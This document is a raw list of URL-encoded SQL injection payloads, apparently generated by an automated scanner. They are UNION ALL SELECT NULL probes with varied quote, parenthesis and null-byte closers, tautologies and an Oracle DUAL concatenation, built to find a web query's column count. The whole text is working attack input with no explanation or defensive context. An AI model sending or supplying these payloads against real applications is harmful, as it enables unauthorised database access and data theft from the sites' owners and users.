foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%208495%3D8495%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%206139%3D6139%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%202545%3D2545%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%201970%3D1970%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%206256%3D6256%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%202377%3D2377%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%204909%3D4909%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%206088%3D6088%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%204525%3D4525%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%20WHERE%208013%3D8013%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%208249%3D8249%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%203799%3D3799%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%202854%3D2854%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%206874%3D6874%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%207049%3D7049%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%204520%3D4520%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%205829%3D5829%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%201791%3D1791%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%206562%3D6562%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20WHERE%208583%3D8583%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%202045%3D2045%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%207196%3D7196%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%204699%3D4699%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%208245%3D8245%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%207742%3D7742%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%201442%3D1442%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%208887%3D8887%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%209444%3D9444%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%208937%3D8937%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%29%20WHERE%206578%3D6578%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%203242%3D3242%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%204478%3D4478%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%205857%3D5857%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%207013%3D7013%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%206446%3D6446%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%205086%3D5086%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%209728%3D9728%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%208879%3D8879%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%209593%3D9593%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20WHERE%203181%3D3181%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%209916%3D9916%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%204945%3D4945%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%203253%3D3253%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%209492%3D9492%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%202384%3D2384%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%205397%3D5397%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%207330%3D7330%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%201162%3D1162%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%205608%3D5608%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20WHERE%206161%3D6161%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%208101%3D8101%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%203509%3D3509%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%209290%3D9290%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%209096%3D9096%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%209969%3D9969%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%201664%3D1664%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%209526%3D9526%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%203310%3D3310%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%202907%3D2907%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%20WHERE%209988%3D9988%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27TryB%27%20FROM%20DUAL%20WHERE%204255%3D4255%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27JUsi%27%20FROM%20DUAL%20WHERE%206370%3D6370%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%7C%7C%28SELECT%20%27kNlW%27%20FROM%20DUAL%20WHERE%208756%3D8756%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 